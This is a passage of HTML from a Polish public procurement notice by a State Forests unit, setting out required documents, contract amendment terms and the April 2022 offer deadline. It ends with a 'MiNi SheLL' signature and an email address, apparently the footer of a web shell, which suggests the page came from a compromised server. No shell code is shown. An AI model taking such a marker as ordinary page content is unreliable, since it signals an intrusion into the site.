są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy, zgodnie z Rozdziałem 7 ustęp 1 – stanowiący załącznik nr 6 do<br/>SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu<br/>o udzielenie zamówienia publicznego Zamawiający żąda:<br/>a) informacji z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>oraz art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego – sporządzonej nie wcześniej niż 6<br/>miesięcy przed jej złożeniem;<br/>b) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz.U. 2021 poz. 275), z<br/>innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 7<br/>do SWZ);<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu<br/>o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu,<br/>w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp oraz art. 108 ust. 1 pkt 4 ustawy Pzp,<br/>dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego oraz art. 108 ust. 1 pkt 3 ustawy, art. 108 ust. 1 pkt 6 ustawy (wzór<br/>oświadczenia stanowi załącznik nr 8 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> . Oferta musi być sporządzona zgodnie z treścią formularza „Oferta Wykonawcy” (wzór<br/>formularza oferty stanowi załącznik nr 1 do SWZ). Integralną część oferty stanowi<br/>wypełniony Formularz cenowy (wzór formularza stanowi załącznik nr 1A, 1B do SWZ).<br/>7. Wraz z ofertą musi zostać złożone Oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu (wzór oświadczenia stanowi załącznik nr 3 do SWZ).<br/>8. Do oferty dodatkowo należy załączyć, jeżeli dotyczy:<br/>1) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, które<br/>dostawy wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi załącznik nr 4<br/>do SWZ),<br/>2) Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdziale 8 ust. 2<br/>pkt 1) niniejszego SWZ, potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji zamówienia (wzór zobowiązania stanowi załącznik nr 5<br/>do SWZ),<br/>3) pełnomocnictwo do występowania w imieniu Wykonawcy,<br/>4) pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty „Oświadczenie, które dostawy wykonają poszczególni Wykonawcy” – jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na zdolnościach tych Wykonawców , którzy wykonują dostawy, do realizacji których te zdolności są wymagane (wzór oświadczenia stanowi załącznik nr 4 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić za zgodą stron wyrażoną na piśmie pod rygorem nieważności w granicach unormowania art. 455 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (Dz.U. z 2021 r. poz. 1129, ze zm.). <br/>2. Zamawiający przewiduje możliwość zmian wynagrodzenia Wykonawcy określonego w § 4 ust. 1 pkt b w przypadku zmiany stawki podatku od towarów i usług (VAT) - w stopniu odpowiadającym zmianie stawki podatku VAT (+/-) w dacie wykonania świadczenia.<br/>3 Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie przepisów wprowadzających zmiany, o których mowa w ust. 2.<br/>4 . W wypadku zmiany, o której mowa w ust. 2 wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.<br/>5. Każda ze stron może żądać wprowadzenia zmian w Umowie w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jeśli nastąpi wywierająca bezpośredni wpływ na dalsze wykonanie umowy zmiana obowiązującego prawa bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).<br/>6. Wszystkie postanowienia określone w § 11 mogą stanowić katalog zmian, na które Zamawiający może wyrazić zgodę, tj. mają charakter fakultatywny, tym samym nie stanowią zobowiązania do wyrażenia takiej zgody przez Zamawiającego i dokonania zmiany Umowy.<br/>7. Warunki zmiany Umowy:<br/>1)	inicjowanie zmian – na uzasadniony wniosek Wykonawcy lub Zamawiającego,<br/>2)	zgoda obu stron,<br/>3)	forma zmian – podpisany przez umocowanych przedstawicieli Zamawiającego i Wykonawcy – aneks do umowy w formie pisemnej, pod rygorem nieważności.<br/>8.	Strony dopuszczają możliwość zmiany Umowy w zakresie niedotyczącym istotnych postanowień Umowy w stosunku do treści oferty Wykonawcy, a w szczególności:<br/>1)	zmian redakcyjnych Umowy,<br/>2)	zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron,<br/>3)	zmian danych Stron ujawnionych rejestrach publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com